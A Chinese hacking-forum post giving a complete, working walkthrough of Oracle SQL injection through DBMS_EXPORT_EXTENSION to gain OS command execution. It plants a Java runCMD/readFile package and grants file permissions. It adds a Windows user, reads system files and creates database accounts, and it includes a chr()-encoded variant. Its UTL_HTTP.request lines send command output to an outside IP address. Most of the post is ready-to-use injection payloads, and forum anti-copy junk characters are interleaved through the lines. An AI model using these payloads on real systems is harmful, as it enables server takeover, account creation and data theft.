中国网络渗透测试联盟

标题: 实例演示oracle注入获取cmdshell的全过程 [打印本页]
作者: admin    时间: 2012-12-18 12:21
标题: 实例演示oracle注入获取cmdshell的全过程
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
2 g0 j9 k; g; b, }8 h/ _2 G! ^' X5 T# r
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)   l* Q" z0 e' V7 g) D9 I
的形式即可。(用" 'a'|| "是为了让语句返回true值)
9 m$ n8 H7 ~( V. Y. x语句有点长,可能要用post提交。 ( c2 V, D: h4 N
以下是各个步骤:
$ e0 C( t! g5 q) r; f2 m! p1.创建包 # _9 Q# x) K, I. M( }! V0 x
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:' I' d4 s8 n* ^% H& {) z' _; m
/xxx.jsp?id=1 and '1'<>'a'||(
* S' v5 i8 u; F3 G, tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 \, M+ ?+ `+ w7 @6 Q- r% o
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
3 M0 [) h( D7 V3 a' u% F( {, fnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}7 i# v2 u0 f8 J) ?" X5 f: E
}'''';END;'';END;--','SYS',0,'1',0) from dual 8 G5 a8 R& a0 ~/ {- s- |4 }: z
) 4 w1 }! D& }' x4 f1 r# B  ~& l% u4 C
------------------------
1 L3 {, ^& }- V4 H- C如果url有长度限制,可以把readFile()函数块去掉,即:
- [: J. ?5 l0 t9 x7 G1 H5 k1 Z/xxx.jsp?id=1 and '1'<>'a'||( 5 e0 c8 q$ m. j7 l! [/ q+ b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''" W) F4 T1 A; M  a. |( v
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(! D8 U) k  W7 B+ z) A$ J# W( e
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
9 V# e% [0 u$ V" i, S}'''';END;'';END;--','SYS',0,'1',0) from dual ( ?! ]* H$ n  E% D' e% Q
) , G) G% F1 m5 e3 q; u
同时把后面步骤 提到的 对readFile()的处理语句去掉。 6 s8 g/ E! n$ D3 M! P. ^
------------------------------ ( V/ P# Z$ {) S; h% I& @5 M& h/ q
2.赋Java权限 7 p* i1 a# E3 l* ?! Q' }( M3 @; D# k
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
  X  X' [0 s' `& P4 D3.创建函数 : r' _2 e0 Z" m! Y" q8 X: X3 l
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''$ Y' ^0 b* }- `. ]. u/ d
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual6 s- \, M6 h: H7 I1 b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''8 O4 O; |; y* S/ }' }3 d
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual, {- |6 M2 C* I
4.赋public执行函数的权限
2 t* g5 E' {2 F( Vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual, A# x9 u% \3 e+ O) A5 o
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual4 g$ R0 J% S' p& w$ n  S: N
5.测试上面的几步是否成功 ) A+ n8 \( q# T9 I0 r
and '1'<>'11'||( & h) @. m* o' u0 @
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
: S$ z( H; z0 })
2 ~: h# V, o# E" A+ E1 Sand '1'<>(
* ]& d* R: ]# C6 ?: F" b1 D4 i4 I2 ~select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
( _/ ~$ s; Q6 Q- B( A0 E9 [)
) x9 |- F  N/ Z2 d! w: H* e6.执行命令:   z* U8 S" W. M% H1 d
/xxx.jsp?id=1 and '1'<>(
5 x: m+ L, C/ y6 S+ nselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual : s1 U& _  M- B, ~  s: I

& _" E/ B  j+ ?)
. \& @5 R( @! [& G. y/xxx.jsp?id=1 and '1'<>( ' b5 ~5 e, x7 x, i! R! _
select  sys.LinxReadFile('c:/boot.ini') from dual- \% L6 ^$ B% r$ ~/ Y/ u) \
5 \0 g3 c; F' q3 W  E
)& i' S# j5 \; H  q7 e4 Q
  / M$ w" Y2 w* a5 ~* t4 k
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
& l, \( }% S* U6 Q如果要查看运行结果可以用 union :
& X1 l, P% ]" ^! M/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual. k9 ^* X+ i7 m4 u/ ]
或者UTL_HTTP.request(:
8 s5 `5 D) g! z( l3 {/xxx.jsp?id=1 and '1'<>( 2 N/ G. z- A4 F3 N9 N
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
# a5 i! |+ Q# M, b( C6 h* i)
; G7 O! O! ]0 k8 O0 ^4 L0 {/xxx.jsp?id=1 and '1'<>(
$ |, o( b  X& U# z5 g- U% ?$ d1 oSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual: F9 Y- L* U' [
)
/ K& ^' [- V6 a7 V/ _6 U/ f注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
, M6 K" k: K& [! m2 w--------------------
/ P% d9 x' H* {# x6 A6.内部变化 3 m  h: x7 u% G5 h1 W) K8 K
通过以下命令可以查看all_objects表达改变: ; o/ O% t, @# C; ]2 k
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
" A1 Z6 e* c$ O7.删除我们创建的函数
2 @2 ~. [, p* Zselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- e; ]) f# _$ h; h4 ~5 ]; Qdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
" t5 J3 O8 v: a5 ?2 I% H/ p3 I====================================================
& T4 H( r  ]) Y全文结束。谨以此文赠与我的朋友。
$ U4 H5 {/ i* `3 k* d  b* i8 Z! glinx
* F9 O8 w& N# p124829445 8 Z2 O) b7 R/ K6 Q5 `! s! ]
2008.1.12
" M' X" o- V8 r2 y$ C! ?3 tlinyujian@bjfu.edu.cn # `' o1 h( M- t$ j
======================================================================
+ f6 t( R: N6 H0 Q6 K测试漏洞的另一方法: 5 M* M2 F4 G; Q: v4 _; ]# k
创建oracle帐号: + K9 B) S/ [$ m+ i, o
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''& i  H& a" S% H
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
9 \! m% B+ U* l( t$ R即:
2 N& ?$ X( C2 ]/ ]0 ], Q3 R" Fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
/ B# ~4 }# [8 l2 @5 T. nchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual ! z1 ~6 k' U! l9 E
确定漏洞存在: 0 i. O* _; F- A' ?' F
1<>( , F" E+ u' V2 f! g
select user_id from all_users where username='LINXSQL'
; f, Q4 n" u+ |4 S; s7 R% u# J) 5 G* `3 F# c$ D7 _8 `% [
给linxsql连接权限: - U! z' [! Y' s' d% |) b- N
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''2 k; G3 D$ p/ x) u/ t
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual 5 H5 {1 Z' f2 O6 w* t& Z( E
删除帐号: 8 r$ F0 t- ~& E$ ?
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 X' [9 M) T. S& K2 h# x& Q9 E
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
0 O. ^5 a. ?8 v4 R7 a. D8 ?0 ?0 W5 h======================
8 R$ W) A; W- _6 n/ e/ L以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
/ C$ ]- m, K/ r$ I2 g* o( c8 W( M2 p/ J1.jsp?id=1 and '1'<>(
! V& ?- q/ A# Q" }select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
' `7 P! }: ]/ gcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
) C4 |( ?! e. p) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE$ k+ H! H  }% B5 z
 ): \4 g$ c$ i* h+ n$ i* g8 _
3 d+ B' H; I1 G! Z, T

9 M  g( Z1 ?$ c
! T. i( C5 z1 y+ g8 W



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2